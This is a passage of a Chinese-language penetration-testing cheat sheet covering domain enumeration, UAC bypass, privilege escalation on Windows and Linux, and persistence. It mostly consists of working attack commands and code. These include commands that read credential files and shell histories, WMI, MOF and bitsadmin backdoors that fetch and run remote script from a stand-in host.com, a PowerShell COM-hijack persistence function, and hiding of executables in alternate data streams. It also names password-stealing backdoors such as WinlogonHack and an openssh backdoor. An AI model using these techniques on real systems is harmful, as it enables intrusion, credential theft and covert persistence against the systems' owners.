dsquery user domainroot -limit 65535 &amp;&amp; net user /domain------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x6240;&#x6709;&#x7528;&#x6237;&#x540D;
dsquery subnet ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x7F51;&#x6BB5;&#x5212;&#x5206;
dsquery group &amp;&amp; net group /domain ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x5206;&#x7EC4; 
dsquery ou ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x7EC4;&#x7EC7;&#x5355;&#x4F4D; 
dsquery server &amp;&amp; net time /domain------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x57DF;&#x63A7;&#x5236;&#x5668;
</code></pre><h2 id="&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><a name="&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;</h2>
<ul>
<li>NETBIOS &#x4FE1;&#x606F;&#x6536;&#x96C6; </li>
<li>SMB &#x4FE1;&#x606F;&#x6536;&#x96C6;  </li>
<li>&#x7A7A;&#x4F1A;&#x8BDD;&#x4FE1;&#x606F;&#x6536;&#x96C6;  </li>
<li>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x7B49; </li>
</ul>
<h1 id="&#x6743;&#x9650;&#x63D0;&#x5347;"><a name="&#x6743;&#x9650;&#x63D0;&#x5347;" class="anchor-navigation-ex-anchor" href="#&#x6743;&#x9650;&#x63D0;&#x5347;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6743;&#x9650;&#x63D0;&#x5347;</h1>
<h2 id="windows_1"><a name="windows_1" class="anchor-navigation-ex-anchor" href="#windows_1"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h2>
<h3 id="bypassuac"><a name="bypassuac" class="anchor-navigation-ex-anchor" href="#bypassuac"><i class="fa fa-link" aria-hidden="true"></i></a>BypassUAC</h3>
<h4 id="&#x5E38;&#x7528;&#x65B9;&#x6CD5;"><a name="&#x5E38;&#x7528;&#x65B9;&#x6CD5;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x65B9;&#x6CD5;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x65B9;&#x6CD5;</h4>
<ul>
<li>&#x4F7F;&#x7528;IFileOperation COM&#x63A5;&#x53E3;</li>
<li>&#x4F7F;&#x7528;Wusa.exe&#x7684;extract&#x9009;&#x9879;</li>
<li>&#x8FDC;&#x7A0B;&#x6CE8;&#x5165;SHELLCODE &#x5230;&#x5080;&#x5121;&#x8FDB;&#x7A0B;</li>
<li>DLL&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;&#x7CFB;&#x7EDF;&#x7684;DLL&#x6587;&#x4EF6;</li>
<li>eventvwr.exe and registry hijacking</li>
<li>sdclt.exe</li>
<li>SilentCleanup</li>
<li>wscript.exe</li>
<li>cmstp.exe</li>
<li>&#x4FEE;&#x6539;&#x73AF;&#x5883;&#x53D8;&#x91CF;&#xFF0C;&#x52AB;&#x6301;&#x9AD8;&#x6743;&#x9650;.Net&#x7A0B;&#x5E8F;</li>
<li>&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;HKCU\Software\Classes\CLSID&#xFF0C;&#x52AB;&#x6301;&#x9AD8;&#x6743;&#x9650;&#x7A0B;&#x5E8F;</li>
<li>&#x76F4;&#x63A5;&#x63D0;&#x6743;&#x8FC7;UAC</li>
</ul>
<h4 id="&#x5E38;&#x7528;&#x5DE5;&#x5177;"><a name="&#x5E38;&#x7528;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x5DE5;&#x5177;</h4>
<ul>
<li><a href="https://github.com/hfiref0x/UACME" target="_blank">UACME </a></li>
<li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC" target="_blank">Bypass-UAC </a></li>
<li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko" target="_blank">Yamabiko </a></li>
<li>... </li>
</ul>
<h3 id="&#x63D0;&#x6743;"><a name="&#x63D0;&#x6743;" class="anchor-navigation-ex-anchor" href="#&#x63D0;&#x6743;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x63D0;&#x6743;</h3>
<ul>
<li><p>windows&#x5185;&#x6838;&#x6F0F;&#x6D1E;&#x63D0;&#x6743;</p>
<blockquote>
<p>&#x68C0;&#x6D4B;&#x7C7B;:<a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester" target="_blank">Windows-Exploit-Suggester</a>,<a href="https://github.com/brianwrf/WinSystemHelper" target="_blank">WinSystemHelper</a>,<a href="https://github.com/bitsadmin/wesng" target="_blank">wesng</a>
&#x5229;&#x7528;&#x7C7B;:<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank">windows-kernel-exploits</a>&#xFF0C;<a href="https://github.com/AlessandroZ/BeRoot.git" target="_blank">BeRoot</a></p>
</blockquote>
</li>
<li><p>&#x670D;&#x52A1;&#x63D0;&#x6743; </p>
<blockquote>
<p>&#x6570;&#x636E;&#x5E93;&#x670D;&#x52A1;&#xFF0C;ftp&#x670D;&#x52A1;&#x7B49;</p>
</blockquote>
</li>
<li><p>WINDOWS&#x9519;&#x8BEF;&#x7CFB;&#x7EDF;&#x914D;&#x7F6E; </p>
</li>
<li>&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E; </li>
<li>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6CE8;&#x518C;&#x8868;&#x6743;&#x9650;&#x914D;&#x7F6E; </li>
<li>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;/&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E; </li>
<li>&#x8BA1;&#x5212;&#x4EFB;&#x52A1; </li>
<li>&#x4EFB;&#x610F;&#x7528;&#x6237;&#x4EE5;NT AUTHORITY\SYSTEM&#x6743;&#x9650;&#x5B89;&#x88C5;msi </li>
<li>&#x63D0;&#x6743;&#x811A;&#x672C; <blockquote>
<p><a href="https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1" target="_blank">PowerUP</a>,<a href="https://github.com/rsmudge/ElevateKit" target="_blank">ElevateKit</a></p>
</blockquote>
</li>
</ul>
<h2 id="linux_1"><a name="linux_1" class="anchor-navigation-ex-anchor" href="#linux_1"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h2>
<h3 id="&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;"><a name="&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;</h3>
<p><a href="https://github.com/SecWiki/linux-kernel-exploits" target="_blank">linux-kernel-exploits </a></p>
<h3 id="&#x8BA1;&#x5212;&#x4EFB;&#x52A1;"><a name="&#x8BA1;&#x5212;&#x4EFB;&#x52A1;" class="anchor-navigation-ex-anchor" href="#&#x8BA1;&#x5212;&#x4EFB;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x8BA1;&#x5212;&#x4EFB;&#x52A1;</h3>
<pre class="language-"><code>crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
</code></pre><h3 id="suid"><a name="suid" class="anchor-navigation-ex-anchor" href="#suid"><i class="fa fa-link" aria-hidden="true"></i></a>SUID</h3>
<pre class="language-"><code>find / -user root -perm -4000 -print 2&gt;/dev/null
find / -perm -u=s -type f 2&gt;/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
</code></pre><h3 id="&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;"><a name="&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;</h3>
<pre class="language-"><code>cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
</code></pre><h3 id="&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;"><a name="&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;" class="anchor-navigation-ex-anchor" href="#&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;/&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;</h3>
<pre class="language-"><code>cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
</code></pre><h3 id="&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;"><a name="&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;" class="anchor-navigation-ex-anchor" href="#&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;</h3>
<pre class="language-"><code>grep -i user [filename]
grep -i pass [filename]
grep -C 5 &quot;password&quot; [filename]
find . -name &quot;*.php&quot; -print0 | xargs -0 grep -i -n &quot;var $password&quot; # Joomla
</code></pre><h1 id="&#x6743;&#x9650;&#x7EF4;&#x6301;"><a name="&#x6743;&#x9650;&#x7EF4;&#x6301;" class="anchor-navigation-ex-anchor" href="#&#x6743;&#x9650;&#x7EF4;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6743;&#x9650;&#x7EF4;&#x6301;</h1>
<h2 id="&#x7CFB;&#x7EDF;&#x540E;&#x95E8;"><a name="&#x7CFB;&#x7EDF;&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#&#x7CFB;&#x7EDF;&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7CFB;&#x7EDF;&#x540E;&#x95E8;</h2>
<h3 id="windows_2"><a name="windows_2" class="anchor-navigation-ex-anchor" href="#windows_2"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h3>
<h4 id="1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;"><a name="1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;</h4>
<p>WinlogonHack 
WinlogonHack &#x662F;&#x4E00;&#x6B3E;&#x7528;&#x6765;&#x52AB;&#x53D6;&#x8FDC;&#x7A0B;3389&#x767B;&#x5F55;&#x5BC6;&#x7801;&#x7684;&#x5DE5;&#x5177;&#xFF0C;&#x5728; WinlogonHack &#x4E4B;&#x524D;&#x6709;&#x4E00;&#x4E2A; Gina &#x6728;&#x9A6C;&#x4E3B;&#x8981;&#x7528;&#x6765;&#x622A;&#x53D6; Windows 2000&#x4E0B;&#x7684;&#x5BC6;&#x7801;&#xFF0C;WinlogonHack &#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x622A;&#x53D6; Windows XP &#x4EE5;&#x53CA; Windows 2003 Server&#x3002;
&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x5668; 
&#x5B89;&#x88C5;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x7684;&#x76EE;&#x5730;&#x4E0D;&#x5149;&#x662F;&#x8BB0;&#x5F55;&#x672C;&#x673A;&#x5BC6;&#x7801;&#xFF0C;&#x662F;&#x8BB0;&#x5F55;&#x7BA1;&#x7406;&#x5458;&#x4E00;&#x5207;&#x7684;&#x5BC6;&#x7801;&#xFF0C;&#x6BD4;&#x5982;&#x8BF4;&#x4FE1;&#x7BB1;&#xFF0C;WEB &#x7F51;&#x9875;&#x5BC6;&#x7801;&#x7B49;&#x7B49;&#xFF0C;&#x8FD9;&#x6837;&#x4E5F;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x5F88;&#x591A;&#x4FE1;&#x606F;&#x3002;
NTPass 
&#x83B7;&#x53D6;&#x7BA1;&#x7406;&#x5458;&#x53E3;&#x4EE4;,&#x4E00;&#x822C;&#x7528; gina &#x65B9;&#x5F0F;&#x6765;,&#x4F46;&#x6709;&#x4E9B;&#x673A;&#x5668;&#x4E0A;&#x5B89;&#x88C5;&#x4E86; pcanywhere &#x7B49;&#x8F6F;&#x4EF6;&#xFF0C;&#x4F1A;&#x5BFC;&#x81F4;&#x8FDC;&#x7A0B;&#x767B;&#x5F55;&#x7684;&#x65F6;&#x5019;&#x51FA;&#x73B0;&#x6545;&#x969C;&#xFF0C;&#x672C;&#x8F6F;&#x4EF6;&#x53EF;&#x5B9E;&#x73B0;&#x65E0;&#x969C;&#x788D;&#x622A;&#x53D6;&#x53E3;&#x4EE4;&#x3002;
Linux &#x4E0B; openssh &#x540E;&#x95E8; 
&#x91CD;&#x65B0;&#x7F16;&#x8BD1;&#x8FD0;&#x884C;&#x7684;sshd&#x670D;&#x52A1;&#xFF0C;&#x7528;&#x4E8E;&#x8BB0;&#x5F55;&#x7528;&#x6237;&#x7684;&#x767B;&#x5F55;&#x5BC6;&#x7801;&#x3002;</p>
<h4 id="2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;"><a name="2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;Payload&#x4F4D;&#x7F6E;</h4>
<p><strong>WMI</strong> :
&#x5B58;&#x50A8;&#xFF1A;</p>
<pre class="language-"><code>$StaticClass = New-Object Management.ManagementClass(&apos;root\cimv2&apos;, $null,$null)
$StaticClass.Name = &apos;Win32_Command&apos;
$StaticClass.Put()
$StaticClass.Properties.Add(&apos;Command&apos; , $Payload)
$StaticClass.Put()
</code></pre><p>&#x8BFB;&#x53D6;:</p>
<pre class="language-"><code>$Payload=([WmiClass] &apos;Win32_Command&apos;).Properties[&apos;Command&apos;].Value
</code></pre><p><strong>&#x5305;&#x542B;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x7684;PE&#x6587;&#x4EF6;</strong>
&#x5229;&#x7528;&#x6587;&#x4EF6;hash&#x7684;&#x7B97;&#x6CD5;&#x7F3A;&#x9677;&#xFF0C;&#x5411;PE&#x6587;&#x4EF6;&#x4E2D;&#x9690;&#x85CF;Payload&#xFF0C;&#x540C;&#x65F6;&#x4E0D;&#x5F71;&#x54CD;&#x8BE5;PE&#x6587;&#x4EF6;&#x7684;&#x6570;&#x5B57;&#x7B7E;&#x540D; 
<strong>&#x7279;&#x6B8A;ADS</strong> 
&#x2026;</p>
<pre class="language-"><code>type putty.exe &gt; ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
</code></pre><p>&#x7279;&#x6B8A;COM&#x6587;&#x4EF6;</p>
<pre class="language-"><code>type putty.exe &gt; \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
</code></pre><p>&#x78C1;&#x76D8;&#x6839;&#x76EE;&#x5F55;</p>
<pre class="language-"><code>type putty.exe &gt;C:\:putty.exe 
wmic process call create C:\:putty.exe
</code></pre><h4 id="3&#x3001;runrunonce-keys"><a name="3&#x3001;runrunonce-keys" class="anchor-navigation-ex-anchor" href="#3&#x3001;runrunonce-keys"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;Run/RunOnce Keys</h4>
<p>&#x7528;&#x6237;&#x7EA7; </p>
<pre class="language-"><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
</code></pre><p>&#x7BA1;&#x7406;&#x5458; </p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
</code></pre><h4 id="4&#x3001;bootexecute-key"><a name="4&#x3001;bootexecute-key" class="anchor-navigation-ex-anchor" href="#4&#x3001;bootexecute-key"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;BootExecute Key</h4>
<p>&#x7531;&#x4E8E;smss.exe&#x5728;Windows&#x5B50;&#x7CFB;&#x7EDF;&#x52A0;&#x8F7D;&#x4E4B;&#x524D;&#x542F;&#x52A8;&#xFF0C;&#x56E0;&#x6B64;&#x4F1A;&#x8C03;&#x7528;&#x914D;&#x7F6E;&#x5B50;&#x7CFB;&#x7EDF;&#x6765;&#x52A0;&#x8F7D;&#x5F53;&#x524D;&#x7684;&#x914D;&#x7F6E;&#x5355;&#x5143;&#xFF0C;&#x5177;&#x4F53;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;&#x4E3A;&#xFF1A;</p>
<pre class="language-"><code>HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager
</code></pre><h4 id="5&#x3001;userinit-key"><a name="5&#x3001;userinit-key" class="anchor-navigation-ex-anchor" href="#5&#x3001;userinit-key"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;Userinit Key</h4>
<p>WinLogon&#x8FDB;&#x7A0B;&#x52A0;&#x8F7D;&#x7684;login scripts,&#x5177;&#x4F53;&#x952E;&#x503C;&#xFF1A;</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
</code></pre><h4 id="6&#x3001;startup-keys"><a name="6&#x3001;startup-keys" class="anchor-navigation-ex-anchor" href="#6&#x3001;startup-keys"><i class="fa fa-link" aria-hidden="true"></i></a>6&#x3001;Startup Keys</h4>
<pre class="language-"><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
</code></pre><h4 id="7&#x3001;services"><a name="7&#x3001;services" class="anchor-navigation-ex-anchor" href="#7&#x3001;services"><i class="fa fa-link" aria-hidden="true"></i></a>7&#x3001;Services</h4>
<p>&#x521B;&#x5EFA;&#x670D;&#x52A1; </p>
<pre class="language-"><code>sc create [ServerName] binPath= BinaryPathName
</code></pre><h4 id="8&#x3001;browser-helper-objects"><a name="8&#x3001;browser-helper-objects" class="anchor-navigation-ex-anchor" href="#8&#x3001;browser-helper-objects"><i class="fa fa-link" aria-hidden="true"></i></a>8&#x3001;Browser Helper Objects</h4>
<p>&#x672C;&#x8D28;&#x4E0A;&#x662F;Internet Explorer&#x542F;&#x52A8;&#x65F6;&#x52A0;&#x8F7D;&#x7684;DLL&#x6A21;&#x5757;</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
</code></pre><h4 id="9&#x3001;appinitdlls"><a name="9&#x3001;appinitdlls" class="anchor-navigation-ex-anchor" href="#9&#x3001;appinitdlls"><i class="fa fa-link" aria-hidden="true"></i></a>9&#x3001;AppInit_DLLs</h4>
<p>&#x52A0;&#x8F7D;User32.dll&#x4F1A;&#x52A0;&#x8F7D;&#x7684;DLL</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
</code></pre><h4 id="10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;"><a name="10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;" class="anchor-navigation-ex-anchor" href="#10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;"><i class="fa fa-link" aria-hidden="true"></i></a>10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;</h4>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\Software\Classes
HKEY_CLASSES_ROOT
</code></pre><h4 id="11&#x3001;bitsadmin"><a name="11&#x3001;bitsadmin" class="anchor-navigation-ex-anchor" href="#11&#x3001;bitsadmin"><i class="fa fa-link" aria-hidden="true"></i></a>11&#x3001;<a href="http://www.liuhaihua.cn/archives/357579.html" target="_blank">bitsadmin</a></h4>
<pre class="language-"><code>bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe &quot;/u /s /i:https://host.com/calc.sct scrobj.dll&quot;
bitsadmin /Resume backdoor
</code></pre><h4 id="12&#x3001;mof-"><a name="12&#x3001;mof-" class="anchor-navigation-ex-anchor" href="#12&#x3001;mof-"><i class="fa fa-link" aria-hidden="true"></i></a>12&#x3001;<a href="https://evi1cg.me/archives/Powershell_MOF_Backdoor.html" target="_blank">mof </a></h4>
<pre class="language-"><code>pragma namespace(&quot;\\\\.\\root\\subscription&quot;) 
instance of __EventFilter as $EventFilter
{
EventNamespace = &quot;Root\\Cimv2&quot;;
Name = &quot;filtP1&quot;;
Query = &quot;Select * From __InstanceModificationEvent &quot;
&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;
&quot;And TargetInstance.Second = 1&quot;;
QueryLanguage = &quot;WQL&quot;;
}; 
instance of ActiveScriptEventConsumer as $Consumer
{
Name = &quot;consP1&quot;;
ScriptingEngine = &quot;JScript&quot;;
ScriptText = &quot;GetObject(\&quot;script:https://host.com/test\&quot;)&quot;;
}; 
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
</code></pre><p>&#x7BA1;&#x7406;&#x5458;&#x6267;&#x884C;&#xFF1A;</p>
<pre class="language-"><code>mofcomp test.mof
</code></pre><h4 id="13&#x3001;wmi"><a name="13&#x3001;wmi" class="anchor-navigation-ex-anchor" href="#13&#x3001;wmi"><i class="fa fa-link" aria-hidden="true"></i></a>13&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/" target="_blank">wmi</a></h4>
<p>&#x6BCF;&#x9694;60&#x79D2;&#x6267;&#x884C;&#x4E00;&#x6B21;notepad.exe</p>
<pre class="language-"><code>wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __EventFilter CREATE Name=&quot;BotFilter82&quot;, EventNameSpace=&quot;root\cimv2&quot;,QueryLanguage=&quot;WQL&quot;, Query=&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &apos;Win32_PerfFormattedData_PerfOS_System&apos;&quot;
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH CommandLineEventConsumer CREATE Name=&quot;BotConsumer23&quot;, ExecutablePath=&quot;C:\Windows\System32\notepad.exe&quot;,CommandLineTemplate=&quot;C:\Windows\System32\notepad.exe&quot;
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __FilterToConsumerBinding CREATE Filter=&quot;__EventFilter.Name=\&quot;BotFilter82\&quot;&quot;, Consumer=&quot;CommandLineEventConsumer.Name=\&quot;BotConsumer23\&quot;&quot;
</code></pre><h4 id="14&#x3001;userland-persistence-with-scheduled-tasks"><a name="14&#x3001;userland-persistence-with-scheduled-tasks" class="anchor-navigation-ex-anchor" href="#14&#x3001;userland-persistence-with-scheduled-tasks"><i class="fa fa-link" aria-hidden="true"></i></a>14&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/" target="_blank">Userland Persistence With Scheduled Tasks</a></h4>
<p>&#x52AB;&#x6301;&#x8BA1;&#x5212;&#x4EFB;&#x52A1;UserTask&#xFF0C;&#x5728;&#x7CFB;&#x7EDF;&#x542F;&#x52A8;&#x65F6;&#x52A0;&#x8F7D;dll</p>
<pre class="language-"><code>function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = &apos;Medium&apos;)]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,

[Switch]
$Force
)
$ScheduledTaskCommandPath = &quot;HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32&quot;
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name &apos;(default)&apos; -ErrorAction SilentlyContinue) -eq $null)){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name &apos;(Default)&apos; -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Verbose &quot;Key already exists, consider using -Force&quot;
exit
}

if (Test-Path $ScheduledTaskCommandPath) {
Write-Verbose &quot;Created registry entries to hijack the UserTask&quot;
}else{
Write-Warning &quot;Failed to create registry key, exiting&quot;
exit
} 
}
Invoke-ScheduledTaskComHandlerUserTask -Command &quot;C:\test\testmsg.dll&quot; -Verbose
</code></pre><h4 id="15&#x3001;netsh"><a name="15&#x3001;netsh" class="anchor-navigation-ex-anchor" href="#15&#x3001;netsh"><i class="fa fa-link" aria-hidden="true"></i></a>15&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/" target="_blank">Netsh</a></h4>
<pre class="language-"><code>netsh add helper c:\test\netshtest.dll
</code></pre><p>&#x540E;&#x95E8;&#x89E6;&#x53D1;&#xFF1A;&#x6BCF;&#x6B21;&#x8C03;&#x7528;netsh</p>
<blockquote>
<p>dll&#x7F16;&#x5199;:<a href="https://github.com/outflanknl/NetshHelperBeacon" target="_blank">https://github.com/outflanknl/NetshHelperBeacon</a></p>
</blockquote>
<h4 id="16&#x3001;shim"><a name="16&#x3001;shim" class="anchor-navigation-ex-anchor" href="#16&#x3001;shim"><i class="fa fa-link" aria-hidden="true"></i></a>16&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/" target="_blank">Shim</a></h4>
<p>&#x5E38;&#x7528;&#x65B9;&#x5F0F;&#xFF1A;
InjectDll
RedirectShortcut
RedirectEXE</p>
<h4 id="17&#x3001;dll&#x52AB;&#x6301;"><a name="17&#x3001;dll&#x52AB;&#x6301;" class="anchor-navigation-ex-anchor" href="#17&#x3001;dll&#x52AB;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>17&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/" target="_blank">DLL&#x52AB;&#x6301;</a></h4>
